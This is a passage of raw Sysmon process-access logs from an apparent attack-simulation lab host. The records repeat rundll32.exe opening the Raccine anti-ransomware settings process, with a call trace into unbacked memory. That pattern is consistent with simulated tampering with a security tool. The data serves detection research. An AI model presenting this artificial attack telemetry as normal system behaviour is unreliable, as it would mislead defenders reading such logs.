Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123252Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.423{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123251Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.423{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123250Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.423{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123249Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.423{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123248Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.423{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123247Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.423{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123246Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.423{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123245Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.423{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123244Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.423{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123243Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.423{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123242Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.423{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123241Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.423{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123240Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.423{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123239Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.423{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123238Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.423{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123237Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.423{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123236Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.422{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123235Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.422{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123234Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.422{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123233Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.422{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123232Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.422{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123231Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.422{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123230Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.422{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123229Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.422{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123228Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.422{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123227Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.422{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123226Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.422{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123225Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.422{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123224Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.422{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123223Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.422{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123222Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.422{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123221Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.422{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123220Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.422{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123219Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.422{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123218Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.422{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123217Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.422{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123216Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.422{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123215Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.422{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123214Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.422{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123213Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.422{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123212Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.422{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123211Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.422{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123210Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.422{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123209Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.422{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123208Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.422{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123207Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.422{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123206Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.422{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123205Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.422{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123204Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.422{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123203Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.422{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123202Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.422{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123201Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.422{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123200Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.422{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123199Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.422{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123198Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.422{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123197Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.422{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123196Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.422{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123195Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.422{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123194Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.421{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123193Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.421{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123192Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.421{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123191Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.421{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123190Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.421{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123189Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.421{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program 